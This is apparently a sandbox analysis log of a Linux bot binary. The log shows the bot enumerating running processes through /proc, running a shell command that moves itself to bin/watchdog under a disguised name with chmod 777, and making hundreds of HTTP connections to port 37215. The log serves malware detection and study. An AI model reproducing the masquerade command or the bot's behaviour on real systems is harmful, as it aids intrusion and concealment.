              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/132/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/253/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/254/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/1238/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/134/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/255/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/256/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/257/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/378/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/3413/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/258/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/259/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/1475/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/936/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/30/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5434)File opened: /proc/816/cmdlineJump to behavior
              Source: /tmp/bot.x86.elf (PID: 5428)Shell command executed: sh -c "rm -rf bin/watchdog && mkdir bin; >bin/watchdog && mv /tmp/bot.x86.elf bin/watchdog; chmod 777 bin/watchdog"Jump to behavior
              Source: /bin/sh (PID: 5432)Chmod executable: /usr/bin/chmod -> chmod 777 bin/watchdogJump to behavior
              Source: /bin/sh (PID: 5430)Mkdir executable: /usr/bin/mkdir -> mkdir binJump to behavior
              Source: /bin/sh (PID: 5429)Rm executable: /usr/bin/rm -> rm -rf bin/watchdogJump to behavior
              Source: /usr/bin/dash (PID: 5473)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.b5Wv15YX0x /tmp/tmp.0KMjnFjb9Z /tmp/tmp.5S47IrwHi8Jump to behavior
              Source: /usr/bin/dash (PID: 5474)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.b5Wv15YX0x /tmp/tmp.0KMjnFjb9Z /tmp/tmp.5S47IrwHi8Jump to behavior
              Source: /usr/bin/chmod (PID: 5432)File: /tmp/bin/watchdog (bits: - usr: rwx grp: rwx all: rwx)Jump to behavior
              Source: /bin/sh (PID: 5432)Chmod executable with 777: /usr/bin/chmod -> chmod 777 bin/watchdogJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: unknownNetwork traffic detected: HTTP traffic on port 46778 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 54054 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43518 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 36604 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37266 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39920 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 49384 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60294 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 49284 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 52752 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 58302 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 46880 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 54592 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 49278 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 58718 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41948 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48268 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 42614 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60340 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38178 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39502 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37256 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45546 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60414 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60592 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 46174 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50620 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57178 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44156 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 33176 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 35408 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51846 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 46466 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41510 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39878 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38412 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 36456 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45278 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55458 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56232 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 40246 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 33380 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 36252 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48292 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 59962 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 54356 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50450 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45416 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43194 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 40804 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53862 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55712 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38368 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60682 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53786 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48844 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39418 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 54650 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55588 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38726 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39650 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 40286 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 32860 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51084 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44906 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 35006 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 33162 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37166 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38956 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45310 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48810 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57780 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 42728 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 52432 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39564 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57118 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45354 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39054 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57406 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56824 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 32930 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53642 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44038 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45042 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51238 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 42406 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37502 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43616 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 35936 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55362 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41838 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43590 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41978 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 33040 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 36838 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41968 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57524 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44172 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41878 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 35648 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 59944 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43388 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 52980 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44534 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37698 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56600 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 36532 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 47824 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51688 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 35202 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 36704 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39150 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39790 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51246 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60432 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43414 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 46826 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57564 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 40648 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57540 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44940 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 46044 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 54030 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53732 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51838 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 33154 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 42296 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 59868 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53516 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55966 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50880 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 49230 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41558 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44802 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 36072 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48294 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37000 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44432 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 46010 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56358 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50088 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51216 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 58782 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43362 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48990 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48922 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45766 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45906 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34148 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44528 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51716 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41046 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 35632 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56004 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 35046 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 33984 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55976 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44020 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43988 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34638 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 33318 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48080 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 54362 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56860 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 58954 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 54602 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 47642 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 59712 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48496 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 52102 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45238 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50506 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45922 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60138 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48918 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 35536 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51478 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 49026 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53746 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50766 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 42026 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57398 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 40690 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60176 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 54018 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56636 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 36238 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45760 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50214 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 42228 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44748 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43668 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 35284 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51416 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 47336 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37658 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53782 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48038 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60458 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 36676 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 49308 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45388 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60552 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43618 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 47076 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 59990 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43270 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53414 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45886 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60372 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44550 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 46096 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 36324 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43864 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 33110 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56500 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 40146 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 33876 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 35166 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 35244 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37828 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37986 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 46182 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 58500 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37700 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55914 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38640 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44444 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 42610 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43744 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38216 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 40700 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55192 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43086 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48310 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48608 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43412 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45080 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34172 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41560 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37736 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 32884 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50306 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 58038 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 33340 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 58048 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 59128 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39162 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 35766 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43962 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 35140 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 35570 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 42538 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 40380 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 32818 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 42542 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34314 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 49276 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41412 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 33786 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56462 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43090 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 49192 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 52322 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 54192 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 52162 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41722 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34030 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 54300 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 46774 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 42030 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 59956 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 46590 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60606 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45428 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 47340 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43676 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56490 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45296 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53984 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48582 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 35902 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48508 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43558 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51146 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48896 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38088 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 59242 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45192 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44544 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56944 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 33464 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44706 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53004 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55086 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 52808 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48870 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51520 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38568 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37620 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55810 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 59964 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 54826 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34400 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 59466 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38486 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44324 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51064 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51414 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53646 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 36558 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34524 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 54296 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48586 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 52552 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41820 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 40508 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 59852 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55928 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53686 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 55678 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 49576 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53122 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60004 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37324 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 35862 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 40082 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38964 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43680 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 46294 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34444 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38730 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51738 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56966 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39830 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44498 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60442 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 54710 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 54024 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 58038 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 49062 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60476 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 46210 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 49246 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 35786 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37400 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 52266 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34494 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60490 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56328 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53770 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44130 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34652 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 54080 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 49008 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53818 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 58128 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 60846 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57854 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 41954 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51394 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 52576 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 47460 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 45188 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 42950 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 35774 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 33940 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 33830 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 33564 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 58422 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37904 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56196 -> 37215
